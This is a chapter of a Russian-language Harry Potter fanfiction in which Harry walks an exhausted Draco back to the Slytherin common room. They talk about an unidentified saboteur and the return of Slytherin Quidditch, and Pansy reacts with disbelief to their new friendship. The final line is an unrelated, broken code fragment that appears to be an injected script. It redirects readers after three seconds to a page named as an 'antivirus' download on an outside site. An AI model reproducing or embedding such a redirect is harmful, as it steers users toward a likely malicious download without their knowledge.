- Времени не было, - ответил тот. – Надо было заняться детьми, попавшими под проклятье, представить новеньких Дамблдору, доставить всех в подземелья и уложить спать. Пришлось повозиться, не говоря уже о том, что они решили сделать перестановку в гостиной.

- Тебе в самом деле надо поспать, - сказала Гермиона. – Ты ужасно выглядишь.

Драко мог бы ответить, что он хотя бы зверски устал, а вот у нее-то какое оправдание? Но девушка сидела рядом с Гарри, и Малфою хотелось показать ему, что слизеринцы могут быть любезны, если захотят. Еще раз зевнув, он кивнул и встал.

- Наверное, лучше мне вернуться к себе, пока я не свалился прямо тут, - он подтолкнул свою недочитанную книгу к Грейнджер. – Сдай ее за меня.

- Пожалуйста, - недовольно пробормотала она, но книгу взяла.

- Я тебя провожу, - предложил Гарри, поднимаясь.

- Я не настолько устал, чтобы потеряться, - заметил Драко, но не стал возражать, когда Гарри пошел рядом.

- Просто не хочу, чтобы ты ходил один, - отозвался тот. – Мы ведь так и не выяснили, кто испортил ингредиенты и пытался тебя подставить.

- Нет? – встревожился Драко. Он думал, что вредителя давно поймали, просто забыли ему об этом сказать. – Но ведь уже давно ничего не случалось.

- Тебя чуть не прикончила толпа студентов, - возразил Гарри. – Дамблдор сказал, что пока мы не поговорили с ними, нельзя исключать, что это вредитель их надоумил.

Драко решил, что в этом есть смысл. Может, ему не следовало проклинать их так сильно. Он ухмыльнулся. Ну уж нет, хорошо, что им досталось по полной – и огнем, и чумой. Жаль, конечно, что у них не осталось сил говорить.

- Я знаю, о чем ты думаешь, - неодобрительно произнес Гарри. – У тебя делается такой вид, только когда ты кому-нибудь хорошенько напакостишь.

- Они это заслужили, - ответил Драко. Он не знал, почему не рассердился на замечание – может, потому что устал, а может потому, что Гарри упрекал его не всерьез. Прижав руку к груди, он ощутил под рубашкой амулет.

- Спасибо, что проводил меня, - мягко сказал он. – Я бы нервничал, будь я один.

- Рад помочь, - улыбнулся Гарри.

Пока они шли, Драко постарался держаться ближе к гриффиндорцу, почти касаясь его плечом, и с удовольствием осознал, что тот не пытается отодвинуться. Само его присутствие успокаивало Драко. Он знал, что Поттер защитит его ото всех, кто захочет причинить ему вред. И разве Дамблдор не говорил, что им с Гарри под силу невозможное, если они вместе?

Ну, может, он не совсем это имел в виду, но все равно.

Когда они подошли ко входу в Слизерин, Драко остановился и повернулся к Гарри, не зная, что сказать. Он списал это на катастрофическую нехватку сна и обрадовался, когда гриффиндорец заговорил первым.

- Как ты думаешь, мы сможем еще позаниматься? Когда ты отоспишься, конечно, - Поттер гордо ухмыльнулся: – Я уже выучил все, что ты мне показывал.

- Конечно, - кивнул Драко. – В следующий раз я научу тебя призывать молнию. Можем позаниматься на квиддичном поле.

- О, еще я хотел узнать, будешь ли ты собирать команду, теперь, когда слизеринцы снова здесь? – воодушевленно поинтересовался Гарри.

- Что? – «Квиддич? Сейчас?» – ошеломленно подумал Драко. – Но ведь сезон давно начался.

- Ну и что? - Поттер упрямо покачал головой. – Я знаю, что ты не ходил смотреть игры. Я бы тоже не пошел, зная, что не могу участвовать – слишком обидно было бы видеть, как играют другие. Но ведь матчи со Слизерином не были разыграны, их просто отложили.

- Ты хочешь сказать, мы все еще в расписании? – недоверчиво переспросил Драко.

- Да. Ваш первый матч через несколько недель. Это будет нелегко, но вы в игре.

Прежде чем слизеринец смог ответить, вход открылся, и на него недовольно посмотрела появившаяся Пэнси.

- Вот ты где, Драко. Надо было сказать, что ты встречаешься с… Поттер? – она замерла и уставилась на Гарри. – Что ты здесь забыл?

- Все в порядке, - успокоил ее гриффиндорец. – Вы меня больше не ненавидите.

- Что? – презрительно прищурилась девушка. – Разумеется…

- Разумеется, нет, - закончил вместо нее Драко. – Я потом объясню, Пэнси, но Поттер прав – мы больше его не ненавидим. Теперь он наш друг.

Пэнси посмотрела на него, как на сумасшедшего. Потом прищурилась, с подозрением перевела взгляд на Гарри и обратно, на Драко.

- Что, черт возьми, произошло, пока нас не было?

- Много чего, - ответил слизеринец, глядя на Гарри. – Увидимся завтра, да?

- Обязательно. Постарайся до тех пор не влипнуть в какую-нибудь неприятность.

- Кто бы говорил.

Драко прислонился к стене, глядя гриффиндорцу вслед и не обращая внимания на раздосадованные возгласы Пэнси. Несмотря на войну и ежедневные маленькие стычки, его мыслями завладел квиддич. Ему придется собрать команду, найти недостающих игроков и организовать беспощадные тренировки, чтобы успеть их натаскать. Он вошел в гостиную, с улыбкой думая  о том, что снова будет играть против Гарри, летать с ним бок о бок, бороться за снитч.

- Здорово,  - пробормотал он. – Как будто теперь я смогу уснуть.

Haean – от староангл. haelan – лечить

Stoabim – от ирландск. stobaim – наносить удар, накалывать.

Предыдущая глава   Оглавление   Следующая глава

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>